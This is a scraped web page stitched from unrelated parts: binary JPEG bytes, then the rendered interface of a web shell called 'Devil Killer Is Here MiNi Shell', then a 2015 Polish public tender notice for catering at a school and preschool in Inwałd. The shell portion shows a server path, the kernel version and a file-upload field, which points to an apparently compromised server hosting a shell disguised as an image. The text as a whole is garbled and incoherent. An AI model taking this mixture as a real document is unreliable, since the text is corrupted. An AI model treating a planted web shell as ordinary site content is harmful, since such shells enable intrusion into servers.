JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151125/173267-N-2015.html

<p class="kh_header"><b>Inwałd: Świadczenie usług cateringowych dla Zespołu Szkół Samorządowych w Inwałdzie</b><br>
<b>Numer ogłoszenia: 173267 - 2015; data zamieszczenia: 25.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Samorządowych w Inwałdzie , ul. Wadowicka 79, 34-120 Inwałd, woj. małopolskie, tel. 0-33 875 13 22, faks 0-33 875 13 22.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług cateringowych dla Zespołu Szkół Samorządowych w Inwałdzie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Świadczenie usług cateringowych (zupy oraz drugiego dania obiadowego wraz z kompotem) dla stołówki Zespołu Szkół Samorządowych w Inwałdzie  oraz ( zupy i drugiego dania obiadowego wraz z kompotem) dla dzieci 3-6 letnich Przedszkola w Zespole Szkół Samorządowych w  Inwałdzie 
Wykaz  zestawów zup dla Przedszkola:
Zestaw 1:
Zupa ziemniaczana z kiełbasą - 250 ml
Zupa grysikowa z warzywami - 250 ml
Zupa kalafiorowa z ziemniakami - 250 ml
Rosół z makaronem - 250 ml
Barszcz czerwony czysty z fasolą - 250 ml
Zestaw 2:
Zupa jarzynowa z ziemniakami - 250 ml
Zupa pomidorowa z makaronem - 250 ml
Barszcz czerwony zabielany z ziemniakami - 250 ml
Rosół z lanym ciastem - 250 ml 
Zupa brokułowa z groszkiem ptysiowym - 250 ml 
Zestaw 3:
Żurek z ziemniakami - 250 ml
Krupnik z warzywami - 250 ml
Rosół z ryżem - 250 ml
Zupa koperkowa z grzankami - 250 ml
Zupa kminkowa z groszkiem ptysiowym - 250 ml
Zestaw 4:
Rosół z makaronem - 250 ml
Żurek z ziemniakami i  białą kiełbasą - 250 ml
Zupa ogórkowa z ryżem - 250 ml 
Zupa grochowa z grzankami - 250 ml
Barszcz ukraiński z kiełbasą - 250 ml
Zestaw 5:
Zupa kalafiorowa z ziemniakami - 250 ml
Zupa jarzynowa z makaronem - 250 ml 
Zupa gulaszowa z ziemniakami - 250 ml 
Zupa pomidorowa z ryżem - 250 ml
Zupa szczawiowa z ryżem - 250 ml 
Zestaw 6 :
Zupa fasolowa z grzankami - 250 ml
Zupa szpinakowa z ziemniakami - 250 ml
Barszcz biały z ziemniakami - 250 ml
Zupa neapolitańska - 250 ml
Zupa krem z dyni z groszkiem ptysiowym - 250 ml
Wykaz zestawów w ramach drugiego dania obiadowego wraz z kompotem dla Przedszkola
ZESTAW I: Pierogi ruskie 200 g + kompot 150 ml + porcja owocu
ZESTAW II: Klopsy 80 g + sos koperkowy 80 g + ziemniaki 100 g + ogórek kiszony 100 g + kompot 150 ml + porcja owocu
ZESTAW III: Gołąbki z mięsem i ryżem 200 g + sos pomidorowy 80 g + kompot 150 ml + porcja owocu
 ZESTAW IV: Kotlet schabowy 70 g + ziemniaki 100 g + kapusta biała zasmażana 100 g + kompot 150 ml + porcja owocu
ZESTAW V: Klopsy rybne 70 g + sos śmietanowy 80 g + ziemniaki 100 g + surówka z kiszonej kapusty 100 g + kompot 150 ml + porcja owocu
ZESTAW VI: Łazanki z kapustą słodką i mięsem 200 g + kompot 150 ml + porcja owocu
ZESTAW VII: Filet z kurczaka duszony 70 g + ziemniaki 100 g +mizeria ze śmietaną 100 g  + kompot 150 ml + porcja owocu
ZESTAW VIII: Pierogi z mięsem 200 g + cebulka 10g z tłuszczem + kompot 150 ml + porcja owocu
ZESTAW IX: Schab duszony w rękawie 70 g + sos pieczeniowy 80 g + ziemniaki 100g + sałatka z kapusty czerwonej 100 g + kompot 150 ml + porcja owocu
ZESTAW X: Filet rybny panierowany 70 g + ziemniaki 100 g + surówka z kapusty kiszonej 100 g + kompot 150 ml + porcja owocu
ZESTAW XI: Leczo 100 g + makaron 100 g + kompot 150 ml + porcja owocu
ZESTAW XII: Kluski z mięsem 200 g + sos pieczeniowy 80 g + surówka z marchwi i jabłka 100 g  + kompot 150 ml + porcja owocu
ZESTAW XIII: Łopatka duszona w rękawie 70 g + sos własny 80 g + ziemniaki 100g + buraki  z chrzanem 100g+ kompot 150 ml + porcja owocu
ZESTAW XIV: Kotlet mielony 70 g + ziemniaki 100 g + marchew z groszkiem zasmażana 100 g + kompot 150 ml + porcja owocu
ZESTAW XV: Kopytka 200 g + sos koperkowy 80 g + sałatka szwedzka 100 g + kompot 150 ml  + porcja owocu
ZESTAW XVI: Kotlet devolay 70 g + ziemniaki 100 g + sałatka z buraków 100 g + kompot 150 ml + porcja owocu
ZESTAW XVII: Pierogi leniwe 200 g + jogurt owocowy 80 g + kompot 150 ml + porcja owocu
ZESTAW XVIII: Kurczak gotowany 100 g + ziemniaki 100 g + surówka z pora 100 g + kompot  150 ml + porcja owocu
ZESTAW XIX: Roladka duszona z marchwią, szynką, ogórkiem 80 g + ziemniaki 100 g + sałatka         z kapusty czerwonej 100 g + kompot 150 ml + porcja owocu
ZESTAW XX: Pierogi z truskawkami 200g + jogurt owocowy 80 ml + kompot 150 ml  + porcja owocu
ZESTAW XXI: Filet z drobiu duszony 70 g + sos własny 80 g + ryż 100 g+ surówka z selera 100 g          + kompot 150 ml + porcja owocu
ZESTAW XXII: Gulasz wieprzowy 100g + kasza 100g + ogórek kiszony 100g + kompot 150ml   + porcja owocu
ZESTAW XXIII: Kluski na parze z owocami 200 g + jogurt owocowy 80 ml  + kompot 150 ml          + porcja owocu
ZESTAW XXIV: Indyk duszony w rękawie 70 g + sos własny 80 g + ziemniaki 100 g + sałatka              z kapusty białej, marchewki i jabłka 100 g + kompot 150 ml + porcja owocu
ZESTAW XXV: Kotlet mielony rybny 70 g + ziemniaki 100 g+ surówka z kapusty kiszonej 100 g             + kompot 150 ml + porcja owocu
ZESTAW XXVI: Spagetti boloneze z serem żółtym 200 g + kompot 150 ml + porcja owocu
ZESTAW XXVII: Potrawka warzywno-drobiowa 100 g + ryż 100 g + kasza 100 g + kompot 150 ml + porcja owocu
ZESTAW XXVIII: Wątróbka drobiowa duszona z cebulką 100 g + ziemniaki 100 g + kapusta               po litewsku 100 g + kompot 150 ml + porcja owocu
ZESTAW XXIX: Pulpety z łopatki 70 g + sos pomidorowy 80 g + ziemniaki 100 g +surówka                    z włoskiej kapusty + kompot 150 ml + porcja owocu
ZESTAW XXX: Rolada z dorsza na parze 70 g + ziemniaki 100 g + sałatka z buraków 100 g                    + kompot 150 ml + porcja owocu
Zobowiązuje się Wykonawcę do dostarczania porcji różnorodnych owoców tzn. jednego dnia są to np. jabłka, drugiego dnia gruszki, mandarynki lub inne owoce sezonowe. Porcja nie może być mniejsza niż 100 g owocu.
Wykaz  zestawów  zup dla stołówki  szkolnej  : 
Zestaw 1:
Rosół  z  makaronem   -  350  ml
Zupa jarzynowa z ziemniakami - 350 ml
Zupa pomidorowa z grubym makaronem - 350 ml
Barszcz czerwony z ziemniakami - 350 ml
Żurek z ziemniakami i jajkiem  -   350  ml
Zestaw 2:
Zupa jarzynowa - 350 ml
Zupa brokułowa z grzankami - 350 ml
Krupnik z warzywami - 350 ml
Rosół  z makaronem - 350 ml
Zupa koperkowa z ryżem - 350 ml
Zestaw 3:
Kapuśniak z kiszonej i słodkiej kapusty z ziemniakami - 350 ml
Barszcz biały z ziemniakami i jajkiem - 350 ml
Rosół z ryżem - 350 ml
Zupa z grochu omielanego z grzankami - 350 ml
Zupa ogórkowa z ryżem - 350 ml
Zestaw 4:
Zupa kalafiorowa z ziemniakami - 350 ml
Rosół z lanym ciastem - 350 ml
Zupa gulaszowa z ziemniakami - 350 ml
Zupa pomidorowa z makaronem - 350 ml
Krupnik z warzywami - 350 ml
Wykaz zestawów w ramach drugiego dania obiadowego wraz z kompotem dla stołówki szkolnej 
ZESTAW I: Gołąbki w sosie pomidorowym 400g + kompot 200 ml + porcja owocu
ZESTAW II: Filet z kurczaka w płatkach 100 g + ziemniaki 190 g + mizeria 150 g + kompot 200 ml + porcja owocu
ZESTAW III: Kluski z mięsem z sosem pieczeniowym 300 g + sałatka szwedzka 150 g + kompot 200 ml + porcja owocu
ZESTAW IV: Schab duszony 100 g + kluski śląskie 190 g + kapusta czerwona 150 g + kompot 200 ml + porcja owocu
ZESTAW  V:  Makaron z serem i polewą truskawkową 400 g + kompot 200 ml + porcja owocu
ZESTAW VI : Filet z kurczaka duszony 100 g + ziemniaki 190 g + warzywa na parze 150 g                       + kompot 200 ml + porcja owocu
ZESTAW VII: Łopatka duszona w rękawie 100 g + ziemniaki 190 g + sałatka z pomidorów 150 g             + kompot 200 ml + porcja owocu  
ZESTAW VIII: Makaron peene z sosem Alla bolonez z i serem 400 g + kompot 200 ml + porcja owocu
ZESTAW IX: Zraziki duszone z sosem 100 g + ziemniaki 190 g + ogórek kiszony 150 g + kompot 200 ml + porcja owocu
ZESTAW X: Filet z dorsza 100g + ziemniaki 190 g + surówka z kiszonej kapusty 150 g + kompot 200 ml + porcja owocu
ZESTAW XI: Devolay 100 g + ziemniaki 190 g + sałatka wielowarzywna 150 g + kompot 200 ml              + porcja owocu
ZESTAW XII: Gotowane bioderko z kurczaka 100 g + ziemniaki 190 g + buraczki czerwone 150 g          + kompot 200 ml + porcja owoców
ZESTAW XIII: Makaron z kawałkami kurczaka z serem i sosem 400 g + kompot 200 ml + porcja owocu
ZESTAW XIV: Pulpety w sosie koperkowym 100 g + ziemniaki 190 g + marchewka z groszkiem 150 g + kompot 200 ml + porcja owocu
ZESTAW  XV :  Pierogi z truskawkami polane masełkiem 400 g + kompot 200 ml + porcja owocu 
ZESTAW XVI: Filet z indyka duszony w sosie 100 g + ziemniaki 190 g + mizeria 150 g + kompot 200 ml + porcja owocu
ZESTAW XVII : bitki wieprzowe 100 g + kasza jęczmienna 190 g + ogórek kiszony 150 g + kompot 200 ml + porcja owocu
ZESTAW XVIII : kopytka z sosem pieczeniowym 300 g + sałatka z buraczków 150 g                               +  kompot 200 ml + porcja owocu
ZESTAW XIX : kotlet mielony 100 g + ziemniaki 190 g + sałatka z kapusty białej, marchewki 150 g + kompot 200 ml + porcja owocu
ZESTAW XX : filet rybny na parze 100 g + ziemniaki 190 g + surówka z kiszonej kapusty 150 g               + kompot 200 ml + porcja owocu
ZESTWA XXI: Kotlet schabowy 100 g + ziemniaki 190 g + kapusta biała zasmażana 150 g                      + kompot 200 ml + porcja owocu
ZESTAW XXII: Łazanki z kapustą słodką i kiszoną z mięsem 400 g + kompot 200 ml                                  + porcja owocu
ZESTAW XXIII: Rolada z kurczaka na parze z sosem pieczeniowym 100 g + ziemniaki 190 g                    + kapusta czerwona 150 g + kompot 200 ml + porcja owocu
ZESTAW XXIV: Filet z kurczaka duszony 100 g + ziemniaki 190 g + surówka z pora 150 g                      +  kompot 200 ml + porcja owocu
ZESTAW XXV: Pierogi leniwe polane jogurtem owocowym 400 g + kompot 200 ml + porcja owocu
Zobowiązuje się Wykonawcę do dostarczania porcji różnorodnych owoców tzn. jednego dnia są to np. jabłka, drugiego dnia gruszki, mandarynki lub inne owoce sezonowe. Porcja nie może być mniejsza niż 100 g owocu.
Wykonawca będzie dostarczał posiłki dla  szkoły  w poszczególnych dniach żywienia zgodnie                         z kolejnością zestawów zup oraz zestawów drugiego dania obiadowego oraz zestawów dla Przedszkola z pkt I niniejszej SIWZ. W przypadku większej liczby dni żywienia w danym miesiącu wydawane będą kolejne zestawy obiadowe poczynając od pierwszego w wykazie. Raz w tygodniu (piątek) serwowana jest potrawa bezmięsna. Zamawiający zastrzega możliwość korekty jadłospisu za zgodą Wykonawcy. 
A)Zamawiający planuje, że:
- dziennie do  Szkoły   należy dostarczyć 85 obiadów  (drugie danie obiadowe wraz z kompotem) oraz 55 zup. Do końca roku 2016 należy dostarczyć 15385  obiadów (drugie danie obiadowe wraz                            z kompotem )tj.  85   obiadów  x  181  dni,  oraz  9955 zup tj. 55 zup    x 181 dni,
- dziennie do  Przedszkola  należy dostarczyć  50 obiadów (drugie danie obiadowe wraz z kompotem),                 oraz  50 zup. Do  końca roku 2016 należy dostarczyć 10450  zestawów   tj. 50 obiadów x 209 dni                     i  50 zup  x 209  dni.
Miesiąc dostawy	Ilość dni usługi 
- stołówka szkolna	Ilość dni usługi
- Przedszkole
Styczeń	9	19
Luty	21	21
Marzec	19	22
Kwiecień	21	21
Maj	18	20
Czerwiec	17	22
Wrzesień	20	22
Październik	19	21
Listopad	20	20
Grudzień	17	21
B) Zamawiający zastrzega, że liczba posiłków jest zmienna. 
Zamawiający danego dnia do godz. 9.00 poinformuje Wykonawcę o ilości dostarczanych posiłków. Ilość posiłków będzie się zmieniać w zależności od frekwencji dzieci. Wykonawca nie może mieć                     w stosunku do Zamawiającego żadnych roszczeń z powodu realizacji umowy w mniejszym zakresie.
C) Wszystkie posiłki powinny być przygotowane zgodnie z obowiązującymi normami                               i przepisami prawa. 
- Wykonawca będzie przygotowywał posiłki zgodnie z zasadami określonymi w ustawie                                  o bezpieczeństwie żywności i żywienia (Dz. U. z 2010r. nr 21 poz. 105 z późn. zm. ) łącznie                          z przepisami wykonawczymi do tej ustawy.
- Jadłospis układany będzie przez Wykonawcę (zaleca się różnorodność i niepowtarzalność dziennych zestawów żywieniowych).
- Bezwzględnie należy przestrzegać norm na składniki pokarmowe i produkty spożywcze określone przez Instytut Żywienia i Żywności. Posiłki mają być przygotowane zgodnie z zasadami racjonalnego żywienia dzieci i młodzieży. 
- Wykonawca będzie przygotowywał posiłki w obiektach lub obiekcie, dla którego Wykonawca posiada decyzję Inspektora Sanitarnego o dopuszczeniu obiektu do przygotowywania posiłków dla potrzeb zbiorowego żywienia dzieci oraz dostarczał posiłki zachowując wymogi sanitarno- epidemiologiczne w zakresie personelu i warunków produkcji oraz weźmie odpowiedzialność za ich przestrzeganie. 
- Wykonawca zobowiązany jest do przygotowania posiłków o najwyższym standardzie, na bazie produktów najwyższej jakości i bezpieczeństwem zgodnie z normami HACCP. Obowiązkiem Wykonawcy jest przechowywanie próbek pokarmowych ze wszystkich przygotowanych                                 i dostarczonych posiłków, każdego dnia przez okres 72 godzin z oznaczeniem daty, godziny, zawartości próbki pokarmowej, z podpisem osoby odpowiedzialnej za pobieranie tych próbek.                                       Za dokumentację z zakresu dobrej praktyki higienicznej i elementy systemu HACCP lub systemu równoważnego dostosowane do warunków cateringowych odpowiada Wykonawca.
Zamawiający zastrzega sobie prawo bieżącej kontroli w zakresie przestrzegania przez Wykonawcę przepisów dotyczących technologii produkcji i jakości wykonywanych usług. 
D) Wykonawca odpowiada za transport przedmiotu zamówienia zgodnie z wymaganiami sanitarnymi dotyczącymi żywności. 
- Transport posiłków powinien odbywać się w pojemnikach transportowych - termosach wykonanych             z polipropylenu z podwójnymi ściankami izolującymi zapewniających właściwą ochronę                                    i temperaturę oraz jakość przewożonych potraw środkami transportu przystosowanymi do przewozu żywności. 
- Dostarczenie posiłków z miejsca produkcji do pomieszczenia dystrybucji w szkole realizowane będzie przez Wykonawcę na jego koszt.
- Wykonawca dostarczy szczelne pojemniki na odpady żywnościowe. Po spożyciu posiłków Wykonawca usunie tego samego dnia z terenu szkoły wszelkie odpady żywnościowe na swój koszt. 
- Koszty związane z myciem zastawy obiadowej, sprzątaniem kuchni ponosić będzie Zamawiający.
- Wykonawca  przyuczy  na  swój  koszt obsługę  stołówki Zamawiającego  do  wydawania  posiłków ( porcjowanie  posiłków )  przez  pierwszy  tydzień  żywienia .
E) Koszty związane z myciem termosów - pojemników transportowych ponosić będzie                  Wykonawca i zobowiązuje się do ich mycia w swojej siedzibie. Koszty te są ujęte przez Wykonawcę   w cenie obiadu.
F) Posiłki dla Szkoły Podstawowej i Gimnazjum będą wydawane na zastawie obiadowej                     (120 sztuk dużych talerzy i 70 talerzy  głębokich  na  zupy,  sztućce: widelce, noże po - 120  szt. oraz łyżki 70 sztuk, szklanki na kompot - 120 szt.) - użyczonej nieodpłatnie Zamawiającemu przez Wykonawcę na okres obowiązywania umowy. 
G) Posiłki dla Przedszkola będą wydawane na zastawie obiadowej (60 sztuk dużych talerzy                       i 60 głębokich talerzy na  zupy,  sztućce: widelce, noże po - 60  szt. oraz łyżki 60 sztuk, szklanki na kompot - 60 szt.) - użyczonej nieodpłatnie Zamawiającemu przez Wykonawcę na okres obowiązywania umowy. 
- Wykonawca użyczy także  nieodpłatnie Zamawiającemu: dwukomorowy podgrzewacz                         (z niezależną regulacją temperatur na każdą komorę wraz z piekarnikiem do pojemników transportowych z posiłkami - 1 szt., zamawiający będzie wydawał obiady na kilku przerwach międzylekcyjnych )    elektroniczną wagę do warzenia dostarczanych posiłków, termometr do mierzenia temperatury potraw, kulkownicę metalową do wydawania ziemniaków, oraz  lodówkę - 1 szt. , na okres obowiązywania umowy. Ponadto w  razie awarii Wykonawca użyczy nieodpłatnie zmywarki Zamawiającemu.  
 - Zamawiający nie ponosi odpowiedzialności finansowej za zniszczenie i uszkodzenie  termosów  pojemników i  podgrzewaczy  z przyczyn niezależnych od Zamawiającego oraz za stłuczenie                  w trakcie użytkowania 10% zastawy użyczonej przez Wykonawcę. 
- Braki w zastawie powyżej 10% uzupełni Zamawiający na swój koszt. 
H) Wykonawca gwarantuje, że usługi świadczone będą na najwyższym poziomie, a mianowicie:
Dostarczone posiłki muszą być świeże i winny być przyrządzone w dniu dostawy.
I) Wykonawca zobowiązuje się do terminowego dostarczania posiłków w okresie od 04.01.2016 r. do 22.12.2016 r. w dniach pracy szkoły z wyłączeniem: ferii zimowych i letnich, dni świątecznych, ustawowo i dodatkowo wolnych dni od zajęć dydaktyczno - wychowawczych, w stałych godzinach przerwy międzylekcyjnej od godz. 10.50 do godz. 11.00  wraz z wniesieniem do stołówki szkolnej.
J) Wykonawca zobowiązuje się do terminowego dostarczania  i wydawania posiłków dla Przedszkola w okresie od 04.01.2016 r. do 31.12.2016 r. w dniach pracy przedszkola  z wyłączeniem: ferii letnich, dni świątecznych, ustawowo i dodatkowo wolnych dni od zajęć dydaktyczno - wychowawczych, w stałych godzinach: od 10.50-11.00 wraz z wniesieniem do dwóch sal Przedszkola.
W przypadku awarii lub innych nie przewidzianych zdarzeń Wykonawca jest zobowiązany zapewnić posiłki o niezgorszej jakości na swój koszt z innych źródeł. 
K) Rozliczenia finansowe z Wykonawcą będą odbywały się w miesięcznych okresach rozliczeniowych na podstawie ilości dostarczonych posiłków przez Wykonawcę i płatne na rachunek Wykonawcy w terminie 14 dni licząc od dnia otrzymania przez Zamawiającego prawidłowej pod  względem formalnym i rachunkowym faktury VAT. Do faktury należy dołączyć wartości kaloryczne oraz normy dostarczonych posiłków.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w wysokości  do 50 % wartości zamówienia podstawowego zgodnie z art. 67 ust.1 pkt.6  ust. Prawo Zamówień Publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.40.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie żada wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:
a) złoży oświadczenie o spełnianiu warunków - na formularzu wg wzoru jak w załączniku  nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:
A. wykaże (na formularzu wg wzoru jak w załączniku nr 3 do SIWZ), że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej jedną usługę cateringową (przygotowywanie i transport ciepłego posiłku) trwającą co najmniej dwanaście miesięcy dla minimum  30 dzieci przedszkolnych lub  młodzieży szkolnej. W przypadku wykonywania i nie zakończenia jeszcze usługi Wykonawca zobowiązany jest podać na jaką wartość do momentu upływu terminu składania ofert, umowa została wykonana. Wartość ta będzie brana pod uwagę do oceny spełniania warunku. Fakt wykonania takiej usługi musi być potwierdzony dokumentem, że usługa została wykonana należycie lub jest wykonywana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:
złoży oświadczenie o spełnianiu  warunków - na formularzu wg wzoru jak w załączniku 
nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:
złoży oświadczenie o spełnianiu  warunków - na formularzu wg wzoru jak w załączniku 
nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:
1.	wykaże się posiadaniem opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej                    w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 200 000,00 zł. brutto  (w  przypadku braku potwierdzenia w treści polisy opłaty należy załączyć dokumenty, które będą ten fakt potwierdzać).</p>
</li></ul></li></ul>
